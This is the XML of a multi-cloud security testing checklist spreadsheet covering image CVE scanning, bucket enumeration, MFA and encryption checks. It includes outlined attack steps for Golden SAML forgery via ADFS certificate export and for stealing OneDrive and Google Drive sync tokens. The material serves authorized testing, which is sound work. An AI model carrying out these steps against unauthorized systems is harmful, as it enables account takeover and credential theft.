      <c r="G6" s="5" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H6" s="5" t="inlineStr"/>
    </row>
    <row r="7" ht="16" customHeight="1">
      <c r="A7" s="27" t="inlineStr">
        <is>
          <t xml:space="preserve">  Image Vulnerability Scanning</t>
        </is>
      </c>
    </row>
    <row r="8" ht="60" customHeight="1">
      <c r="A8" s="4" t="inlineStr">
        <is>
          <t>CSEC-HARD-006</t>
        </is>
      </c>
      <c r="B8" s="4" t="inlineStr">
        <is>
          <t>Container Image Vulnerability Scanning</t>
        </is>
      </c>
      <c r="C8" s="4" t="inlineStr">
        <is>
          <t>Scan all container images for known CVEs using automated scanners, prioritising Critical and High severity.</t>
        </is>
      </c>
      <c r="D8" s="4" t="inlineStr">
        <is>
          <t>Trivy, Clair, Snyk, AWS ECR</t>
        </is>
      </c>
      <c r="E8" s="4" t="inlineStr">
        <is>
          <t>1. trivy image &lt;image&gt;:&lt;tag&gt; --severity CRITICAL,HIGH
2. trivy image &lt;acct&gt;.dkr.ecr.&lt;region&gt;.amazonaws.com/&lt;repo&gt;:&lt;tag&gt;
3. trivy image --format json --output trivy-results.json &lt;image&gt;
4. trivy k8s --all-namespaces --report summary
5. aws ecr put-image-scanning-configuration --image-scanning-configuration scanOnPush=true
6. aws ecr describe-image-scan-findings --image-id imageTag=latest</t>
        </is>
      </c>
      <c r="F8" s="4" t="inlineStr">
        <is>
          <t>Pass: No Critical CVEs in production images. High CVEs have remediation timelines. Fail: Critical CVEs in production images.</t>
        </is>
      </c>
      <c r="G8" s="4" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H8" s="4" t="inlineStr"/>
    </row>
  </sheetData>
  <autoFilter ref="A3:H3"/>
  <mergeCells count="4">
    <mergeCell ref="A7:H7"/>
    <mergeCell ref="A4:H4"/>
    <mergeCell ref="A2:H2"/>
    <mergeCell ref="A1:H1"/>
  </mergeCells>
  <dataValidations count="1">
    <dataValidation sqref="G4:G8" showDropDown="0" showInputMessage="0" showErrorMessage="0" allowBlank="1" type="list">
      <formula1>"Not Started,In Progress,Pass,Fail,N/A,Needs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3FA0"/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8" customWidth="1" min="4" max="4"/>
    <col width="60" customWidth="1" min="5" max="5"/>
    <col width="42" customWidth="1" min="6" max="6"/>
    <col width="14" customWidth="1" min="7" max="7"/>
    <col width="30" customWidth="1" min="8" max="8"/>
  </cols>
  <sheetData>
    <row r="1" ht="32" customHeight="1">
      <c r="A1" s="28" t="inlineStr">
        <is>
          <t>🌐 Multi-Cloud Security Testing Checklist</t>
        </is>
      </c>
    </row>
    <row r="2" ht="18" customHeight="1">
      <c r="A2" s="29" t="inlineStr">
        <is>
          <t>Cross-provider tests — AWS · Azure · GCP · Advanced Identity Attacks</t>
        </is>
      </c>
    </row>
    <row r="3" ht="22" customHeight="1">
      <c r="A3" s="30" t="inlineStr">
        <is>
          <t>Test ID</t>
        </is>
      </c>
      <c r="B3" s="30" t="inlineStr">
        <is>
          <t>Test Name</t>
        </is>
      </c>
      <c r="C3" s="30" t="inlineStr">
        <is>
          <t>Objective</t>
        </is>
      </c>
      <c r="D3" s="30" t="inlineStr">
        <is>
          <t>Tools</t>
        </is>
      </c>
      <c r="E3" s="30" t="inlineStr">
        <is>
          <t>Methodology Summary</t>
        </is>
      </c>
      <c r="F3" s="30" t="inlineStr">
        <is>
          <t>Pass/Fail Criteria</t>
        </is>
      </c>
      <c r="G3" s="30" t="inlineStr">
        <is>
          <t>Status</t>
        </is>
      </c>
      <c r="H3" s="30" t="inlineStr">
        <is>
          <t>Notes</t>
        </is>
      </c>
    </row>
    <row r="4" ht="16" customHeight="1">
      <c r="A4" s="31" t="inlineStr">
        <is>
          <t xml:space="preserve">  Cross-Provider Reconnaissance</t>
        </is>
      </c>
    </row>
    <row r="5" ht="60" customHeight="1">
      <c r="A5" s="4" t="inlineStr">
        <is>
          <t>CSEC-RECON-002-ALL</t>
        </is>
      </c>
      <c r="B5" s="4" t="inlineStr">
        <is>
          <t>Cloud Storage Bucket Enumeration (All Providers)</t>
        </is>
      </c>
      <c r="C5" s="4" t="inlineStr">
        <is>
          <t>Discover publicly accessible storage across S3, Azure Blob, and GCS without authentication.</t>
        </is>
      </c>
      <c r="D5" s="4" t="inlineStr">
        <is>
          <t>S3Scanner, AWS CLI, gsutil, curl, Azure CLI</t>
        </is>
      </c>
      <c r="E5" s="4" t="inlineStr">
        <is>
          <t>1. Create wordlist from org name + common suffixes
2. S3: s3scanner scan --bucket-file buckets.txt --enumerate; aws s3 ls s3://&lt;bucket&gt; --no-sign-request
3. Azure Blob: curl -s 'https://&lt;account&gt;.blob.core.windows.net/&lt;container&gt;?restype=container&amp;comp=list'
4. GCS: gsutil ls gs://&lt;bucket-name&gt;</t>
        </is>
      </c>
      <c r="F5" s="4" t="inlineStr">
        <is>
          <t>Pass: All storage requires auth, returns 403. Fail: Any bucket allows unauthenticated listing/reading/writing.</t>
        </is>
      </c>
      <c r="G5" s="4" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H5" s="4" t="inlineStr"/>
    </row>
    <row r="6" ht="60" customHeight="1">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>CSEC-RECON-003-ALL</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>Cloud Infrastructure Fingerprinting (All Providers)</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>Identify all cloud providers in use, regions, and exposed services via DNS, HTTP headers, and OSINT.</t>
        </is>
      </c>
      <c r="D6" s="5" t="inlineStr">
        <is>
          <t>dig, curl, Shodan, Censys, nmap</t>
        </is>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>1. Run: dig ANY target.com; dig CNAME app.target.com
2. curl -sI https://target.com | grep -iE "x-amz|x-azure|x-goog|cf-ray|via"
3. Shodan: org:"Target Company" port:6443,2375
4. Identify CSP from CNAME patterns (amazonaws, windows.net, appspot.com)</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>Pass: Cloud provider not readily discoverable. Fail: CSP, services, regions, mgmt interfaces identifiable.</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H6" s="5" t="inlineStr"/>
    </row>
    <row r="7" ht="16" customHeight="1">
      <c r="A7" s="31" t="inlineStr">
        <is>
          <t xml:space="preserve">  Advanced Identity Attacks (SAML · MitC · OIDC)</t>
        </is>
      </c>
    </row>
    <row r="8" ht="60" customHeight="1">
      <c r="A8" s="4" t="inlineStr">
        <is>
          <t>CSEC-IAM-007-ALL</t>
        </is>
      </c>
      <c r="B8" s="4" t="inlineStr">
        <is>
          <t>MFA Enforcement Assessment (All Platforms)</t>
        </is>
      </c>
      <c r="C8" s="4" t="inlineStr">
        <is>
          <t>Verify MFA is enforced for all IAM users across AWS, Azure, and GCP platforms.</t>
        </is>
      </c>
      <c r="D8" s="4" t="inlineStr">
        <is>
          <t>AWS CLI, Azure CLI, gcloud CLI, Prowler</t>
        </is>
      </c>
      <c r="E8" s="4" t="inlineStr">
        <is>
          <t>1. AWS: aws iam generate-credential-report; check mfa_active; prowler aws --checks iam_root_mfa_enabled
2. Azure: prowler azure --checks iam_ensure_mfa_is_enabled_for_all_users
3. GCP: verify 2-Step Verification enforcement
4. Check SCPs/Conditional Access policies enforce MFA</t>
        </is>
      </c>
      <c r="F8" s="4" t="inlineStr">
        <is>
          <t>Pass: MFA enabled for all users on all platforms. Root/Global Admin MFA enabled. Fail: Any user lacks MFA.</t>
        </is>
      </c>
      <c r="G8" s="4" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H8" s="4" t="inlineStr"/>
    </row>
    <row r="9" ht="60" customHeight="1">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>CSEC-IDENTITY-001</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>Golden SAML Attack — ADFS Token Signing Certificate Theft</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>Test if ADFS token-signing certificate can be extracted and used to forge SAML assertions for persistent cloud access.</t>
        </is>
      </c>
      <c r="D9" s="5" t="inlineStr">
        <is>
          <t>ADFSpoof, Mimikatz, AWS CLI</t>
        </is>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>1. Get-AdfsCertificate -CertificateType Token-Signing
2. Export: certutil -exportpfx ...
3. Get-AdfsProperties | Select-Object Identifier
4. python3 ADFSpoof.py -b adfs_signing.pfx ... --nameid phantom.admin@target.com ...
5. aws sts assume-role-with-saml --saml-assertion $(base64 -w0 forged.xml)</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>Pass: Cert in HSM, non-exportable. Forged token rejected. Fail: Signing cert exportable; forged SAML accepted by AWS/Azure.</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H9" s="5" t="inlineStr"/>
    </row>
    <row r="10" ht="60" customHeight="1">
      <c r="A10" s="4" t="inlineStr">
        <is>
          <t>CSEC-IDENTITY-002</t>
        </is>
      </c>
      <c r="B10" s="4" t="inlineStr">
        <is>
          <t>Man-in-the-Cloud (MitC) — Sync Token Replacement</t>
        </is>
      </c>
      <c r="C10" s="4" t="inlineStr">
        <is>
          <t>Test if cloud storage sync tokens (OneDrive, Google Drive, Dropbox) can be stolen for persistent account access.</t>
        </is>
      </c>
      <c r="D10" s="4" t="inlineStr">
        <is>
          <t>Windows Credential Manager, Python3, cloud sync clients</t>
        </is>
      </c>
      <c r="E10" s="4" t="inlineStr">
        <is>
          <t>1. Locate OneDrive tokens: %LOCALAPPDATA%\Microsoft\OneDrive\settings\Business1\
2. cmdkey /list | findstr OneDrive
3. Google Drive token: SQLite DB at %LOCALAPPDATA%\Google\Drive\user_default\credentials
4. Extract refresh token from SQLite
5. Exchange for new access token via OAuth2 endpoint
6. List files with stolen token</t>
        </is>
      </c>
      <c r="F10" s="4" t="inlineStr">
        <is>
          <t>Pass: Tokens encrypted with DPAPI. Cloud provider detects anomalous device/IP and revokes. Fail: Stolen token provides persistent access.</t>
        </is>
      </c>
      <c r="G10" s="4" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H10" s="4" t="inlineStr"/>
    </row>
    <row r="11" ht="60" customHeight="1">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>CSEC-IDENTITY-003</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>Cross-Cloud OIDC Trust Misconfiguration</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>Test OIDC-based trust relationships (GitHub Actions→AWS, GCP Workload Identity→AWS) for overly broad sub claims.</t>
        </is>
      </c>
      <c r="D11" s="5" t="inlineStr">
        <is>
          <t>AWS CLI, curl, GitHub Actions</t>
        </is>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>1. aws iam list-open-id-connect-providers
2. aws iam get-open-id-connect-provider --open-id-connect-provider-arn &lt;arn&gt;
3. Check role trust: look for 'repo:*' wildcard in sub condition
4. Test from GitHub Actions: request JWT and call aws sts assume-role-with-web-identity
5. gcloud iam workload-identity-pools list --location=global</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>Pass: OIDC trust restricts to specific repo/branch/env. No wildcards. Fail: Any GitHub repo/workflow can assume the cloud role.</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H11" s="5" t="inlineStr"/>
    </row>
    <row r="12" ht="16" customHeight="1">
      <c r="A12" s="31" t="inlineStr">
        <is>
          <t xml:space="preserve">  Encryption at Rest — All Providers</t>
        </is>
      </c>
    </row>
    <row r="13" ht="60" customHeight="1">
      <c r="A13" s="4" t="inlineStr">
        <is>
          <t>CSEC-HARD-004-ALL</t>
        </is>
      </c>
      <c r="B13" s="4" t="inlineStr">
        <is>
          <t>Cloud Encryption at Rest — All Providers</t>
        </is>
      </c>
      <c r="C13" s="4" t="inlineStr">
        <is>
          <t>Verify all data at rest across S3, RDS, EBS, Azure Storage, and GCS is encrypted with managed keys.</t>
        </is>
      </c>
      <c r="D13" s="4" t="inlineStr">
        <is>
          <t>AWS CLI, Azure CLI, gcloud CLI, Prowler</t>
        </is>
      </c>
      <c r="E13" s="4" t="inlineStr">
        <is>
          <t>1. AWS S3: loop buckets, check get-bucket-encryption
2. AWS RDS: aws rds describe-db-instances --query ..Encrypted
3. AWS EBS: aws ec2 describe-volumes --query ..Encrypted; get-ebs-encryption-by-default
4. Azure: az storage account list --query ..encryption
5. prowler aws --checks s3_bucket_default_encryption rds_instance_storage_encrypted ec2_ebs_volume_encryption_enabled</t>
        </is>
      </c>
      <c r="F13" s="4" t="inlineStr">
        <is>
          <t>Pass: All S3/RDS/EBS/Azure Storage encrypted. EBS encryption by default enabled. Fail: Any storage resource without encryption.</t>
        </is>
      </c>
      <c r="G13" s="4" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H13" s="4" t="inlineStr"/>
    </row>
  </sheetData>
  <autoFilter ref="A3:H3"/>
  <mergeCells count="5">
    <mergeCell ref="A12:H12"/>
    <mergeCell ref="A4:H4"/>
    <mergeCell ref="A7:H7"/>
    <mergeCell ref="A2:H2"/>
    <mergeCell ref="A1:H1"/>
  </mergeCells>
  <dataValidations count="1">
    <dataValidation sqref="G4:G13" showDropDown="0" showInputMessage="0" showErrorMessage="0" allowBlank="1" type="list">
      <formula1>"Not Started,In Progress,Pass,Fail,N/A,Needs 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2026-05-02T09:07:45Z</dcterms:created>
  <dcterms:modified xmlns:dcterms="http://purl.org/dc/terms/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="dcterms:W3CDTF">2026-05-02T09:07:45Z</dcterms:modified>
</cp:coreProperties>
</file>